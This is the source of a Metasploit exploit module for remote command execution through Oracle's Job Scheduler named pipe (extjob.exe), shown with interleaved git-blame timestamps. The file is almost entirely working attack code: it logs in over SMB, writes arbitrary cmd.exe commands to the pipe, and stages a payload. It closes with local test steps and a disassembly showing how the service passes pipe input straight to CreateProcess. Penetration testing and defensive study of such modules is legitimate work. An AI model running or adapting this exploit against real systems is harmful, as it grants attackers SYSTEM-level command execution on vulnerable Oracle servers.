2011-12-23 07:22:39 +00:00
|
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-12-23 07:22:39 +00:00
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
|
Rank = ExcellentRanking
|
2011-12-23 07:22:39 +00:00
|
|
|
|
|
2015-02-13 23:17:59 +00:00
|
|
|
|
include Msf::Exploit::Remote::SMB::Client
|
2014-02-08 00:46:19 +00:00
|
|
|
|
include Msf::Exploit::CmdStager
|
2011-12-23 07:22:39 +00:00
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
|
def initialize(info = {})
|
|
|
|
|
super(update_info(info,
|
|
|
|
|
'Name' => 'Oracle Job Scheduler Named Pipe Command Execution',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job
|
|
|
|
|
Scheduler is implemented via the component extjob.exe which listens on a named pipe
|
|
|
|
|
called "orcljsex<SID>" and execute arbitrary commands received over this channel via
|
|
|
|
|
CreateProcess(). In order to connect to the Named Pipe remotely, SMB access is required.
|
|
|
|
|
Note that the Job Scheduler is disabled in default installations.
|
|
|
|
|
},
|
|
|
|
|
'Author' =>
|
|
|
|
|
[
|
|
|
|
|
'David Litchfield', # Vulnerability discovery and exploit
|
|
|
|
|
'juan vazquez', # Metasploit module
|
|
|
|
|
'sinn3r' # Metasploit fu
|
|
|
|
|
],
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
|
|
|
|
[ 'URL', 'http://www.amazon.com/Oracle-Hackers-Handbook-Hacking-Defending/dp/0470080221' ],
|
|
|
|
|
],
|
|
|
|
|
'Payload' =>
|
|
|
|
|
{
|
|
|
|
|
'Space' => 2048,
|
|
|
|
|
},
|
|
|
|
|
'Platform' => 'win',
|
|
|
|
|
# This module has been tested on Oracle 10g Release 1
|
|
|
|
|
# where the Oracle Job Scheduler runs as SYSTEM on Windows
|
|
|
|
|
'Targets' => [['Automatic',{}]],
|
2014-02-08 23:11:47 +00:00
|
|
|
|
'CmdStagerFlavor' => 'vbs',
|
2013-08-30 21:28:54 +00:00
|
|
|
|
'Privileged' => true,
|
|
|
|
|
'DisclosureDate' => 'Jan 01 2007',
|
|
|
|
|
'DefaultTarget' => 0))
|
2011-12-23 07:22:39 +00:00
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
OptString.new('SID', [ true, 'The database sid', 'ORCL'])
|
|
|
|
|
], self.class)
|
2011-12-23 07:22:39 +00:00
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
|
end
|
2011-12-23 07:22:39 +00:00
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
|
def exploit
|
2014-12-16 15:42:42 +00:00
|
|
|
|
if check == Exploit::CheckCode::Vulnerable
|
|
|
|
|
print_status("Exploiting through \\\\#{datastore['RHOST']}\\orcljsex#{datastore['SID']} named pipe...")
|
|
|
|
|
execute_cmdstager({:linemax => 1500})
|
|
|
|
|
handler
|
|
|
|
|
else
|
|
|
|
|
print_error "#{rhost} does not appear to be vulnerable!"
|
|
|
|
|
end
|
2013-08-30 21:28:54 +00:00
|
|
|
|
end
|
2011-12-23 07:22:39 +00:00
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
|
def execute_command(cmd, opts)
|
|
|
|
|
connect()
|
|
|
|
|
smb_login()
|
|
|
|
|
pipe = simple.create_pipe("\\orcljsex#{datastore['SID']}")
|
|
|
|
|
pipe.write("cmd.exe /q /c #{cmd}")
|
|
|
|
|
pipe.close
|
|
|
|
|
disconnect
|
|
|
|
|
end
|
2011-12-23 07:22:39 +00:00
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
|
def check
|
2011-12-23 07:22:39 +00:00
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
|
begin
|
|
|
|
|
connect()
|
|
|
|
|
smb_login()
|
|
|
|
|
pipe = simple.create_pipe("\\orcljsex#{datastore['SID']}")
|
|
|
|
|
pipe.write("cmd.exe /q /c dir")
|
|
|
|
|
result = pipe.read() # Exit Code
|
|
|
|
|
pipe.close
|
|
|
|
|
disconnect
|
|
|
|
|
rescue
|
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
|
end
|
2011-12-23 07:22:39 +00:00
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
|
if result == "1" # Exit Code should be 1
|
|
|
|
|
return Exploit::CheckCode::Vulnerable
|
|
|
|
|
end
|
2011-12-23 07:22:39 +00:00
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
|
return Exploit::CheckCode::Safe
|
2011-12-23 07:22:39 +00:00
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
|
end
|
2011-12-23 07:22:39 +00:00
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
=begin
|
|
|
|
|
How To Test locally:
|
|
|
|
|
1. Go to Administrative Tools -> Services -> Set 'OracleJobSchedulerORCL' to automatic, and
|
|
|
|
|
then Start the service.
|
|
|
|
|
2. Make sure you know your SMBUser and SMBPass
|
|
|
|
|
3. Run:
|
|
|
|
|
C:\Documents and Settings\juan\PipeList>echo cmd.exe /c calc.exe > \\.\pipe\orcljsexorcl
|
|
|
|
|
|
|
|
|
|
Code Analysis of extjob.exe (Oracle 10g Release 1)
|
|
|
|
|
=================================================
|
|
|
|
|
|
|
|
|
|
From _ServiceStart():
|
|
|
|
|
|
|
|
|
|
* Create Named Pipe and store handle on "esi":
|
|
|
|
|
|
|
|
|
|
.text:004017EC push offset _pipename
|
|
|
|
|
.text:004017F1 lea ecx, [ebp+Name]
|
|
|
|
|
.text:004017F7 push offset $SG59611 ; "\\\\.\\pipe\\orcljsex%s"
|
|
|
|
|
.text:004017FC push ecx
|
|
|
|
|
.text:004017FD jmp short loc_401810
|
|
|
|
|
.text:004017FF ; ---------------------------------------------------------------------------
|
|
|
|
|
.text:004017FF
|
|
|
|
|
.text:004017FF loc_4017FF: ; CODE XREF: _ServiceStart+FAj
|
|
|
|
|
.text:004017FF push offset $SG59613
|
|
|
|
|
.text:00401804 lea edx, [ebp+Name]
|
|
|
|
|
.text:0040180A push offset $SG59614 ; "\\\\.\\pipe\\orcljsex%s"
|
|
|
|
|
.text:0040180F push edx ; Dest
|
|
|
|
|
.text:00401810
|
|
|
|
|
.text:00401810 loc_401810: ; CODE XREF: _ServiceStart+10Dj
|
|
|
|
|
.text:00401810 call ds:__imp__sprintf
|
|
|
|
|
.text:00401816 add esp, 0Ch
|
|
|
|
|
.text:00401819 push edi
|
|
|
|
|
.text:0040181A push edi
|
|
|
|
|
.text:0040181B push 4
|
|
|
|
|
.text:0040181D call _ReportStatusToSCMgr
|
|
|
|
|
.text:00401822 add esp, 0Ch
|
|
|
|
|
.text:00401825 test eax, eax
|
|
|
|
|
.text:00401827 jz loc_4018EC
|
|
|
|
|
.text:0040182D mov edi, ds:__imp__CreateNamedPipeA@32 ; CreateNamedPipeA(x,x,x,x,x,x,x,x)
|
|
|
|
|
.text:0040185C mov esi, eax
|
|
|
|
|
|
|
|
|
|
* Connect Named Pipe
|
|
|
|
|
|
|
|
|
|
.text:0040188F push eax ; lpOverlapped
|
|
|
|
|
.text:00401890 push esi ; hNamedPipe
|
|
|
|
|
.text:00401891 call ds:__imp__ConnectNamedPipe@8 ; ConnectNamedPipe(x,x)
|
|
|
|
|
|
|
|
|
|
* Create Thread with ExecMain() as lpStartAddress and esi (The Pipe handle) as parameter
|
|
|
|
|
|
|
|
|
|
.text:004018B9 lea edx, [ebp+ThreadId]
|
|
|
|
|
.text:004018BC push edx ; lpThreadId
|
|
|
|
|
.text:004018BD push 0 ; dwCreationFlags
|
|
|
|
|
.text:004018BF push esi ; lpParameter
|
|
|
|
|
.text:004018C0 push offset _ExecMain ; lpStartAddress
|
|
|
|
|
.text:004018C5 push 0 ; dwStackSize
|
|
|
|
|
.text:004018C7 push 0 ; lpThreadAttributes
|
|
|
|
|
.text:004018C9 call ds:__imp__CreateThread@24 ; CreateThread(x,x,x,x,x,x)
|
|
|
|
|
|
|
|
|
|
From ExecMain():
|
|
|
|
|
|
|
|
|
|
* Stores Named Pipe Handle in ebx
|
|
|
|
|
|
|
|
|
|
.text:0040197C mov ebx, [ebp+hObject]
|
|
|
|
|
|
|
|
|
|
* Read From Named Pipe
|
|
|
|
|
|
|
|
|
|
.text:004019C4 lea eax, [ebp+NumberOfBytesRead]
|
|
|
|
|
.text:004019C7 push edx ; lpOverlapped
|
|
|
|
|
.text:004019C8 push eax ; lpNumberOfBytesRead
|
|
|
|
|
.text:004019C9 lea ecx, [ebp+Buffer]
|
|
|
|
|
.text:004019CF push 10000h ; nNumberOfBytesToRead
|
|
|
|
|
.text:004019D4 push ecx ; lpBuffer
|
|
|
|
|
.text:004019D5 push ebx ; hFile
|
|
|
|
|
.text:004019D6 call ds:__imp__ReadFile@20 ; ReadFile(x,x,x,x,x)
|
|
|
|
|
|
|
|
|
|
* CreateProcess with lpCommandLine full controlled by the user input
|
|
|
|
|
|
|
|
|
|
.text:00401A06 mov ecx, 11h
|
|
|
|
|
.text:00401A0B xor eax, eax
|
|
|
|
|
.text:00401A0D lea edi, [ebp+StartupInfo]
|
|
|
|
|
.text:00401A10 push esi
|
|
|
|
|
.text:00401A11 rep stosd
|
|
|
|
|
.text:00401A13 lea eax, [ebp+ProcessInformation]
|
|
|
|
|
.text:00401A16 lea ecx, [ebp+StartupInfo]
|
|
|
|
|
.text:00401A19 push eax ; lpProcessInformation
|
|
|
|
|
.text:00401A1A push ecx ; lpStartupInfo
|
|
|
|
|
.text:00401A1B push 0 ; lpCurrentDirectory
|
|
|
|
|
.text:00401A1D push 0 ; lpEnvironment
|
|
|
|
|
.text:00401A1F push 0 ; dwCreationFlags
|
|
|
|
|
.text:00401A21 push 0 ; bInheritHandles
|
|
|
|
|
.text:00401A23 push 0 ; lpThreadAttributes
|
|
|
|
|
.text:00401A25 lea edx, [ebp+Buffer]
|
|
|
|
|
.text:00401A2B push 0 ; lpProcessAttributes
|
|
|
|
|
.text:00401A2D push edx ; lpCommandLine
|
|
|
|
|
.text:00401A2E push 0 ; lpApplicationName
|
|
|
|
|
.text:00401A30 mov [ebp+StartupInfo.cb], 44h
|
|
|
|
|
.text:00401A37 mov [ebp+StartupInfo.wShowWindow], 5
|
|
|
|
|
.text:00401A3D mov [ebp+StartupInfo.dwFlags], 100h
|
|
|
|
|
.text:00401A44 mov [ebp+StartupInfo.lpDesktop], offset $SG59671
|
|
|
|
|
.text:00401A4B call ds:__imp__CreateProcessA@40 ; CreateProcessA(x,x,x,x,x,x,x,x,x,x)
|
|
|
|
|
|
|
|
|
|
|
2011-12-28 19:42:56 +00:00
|
|
|
|
=end
|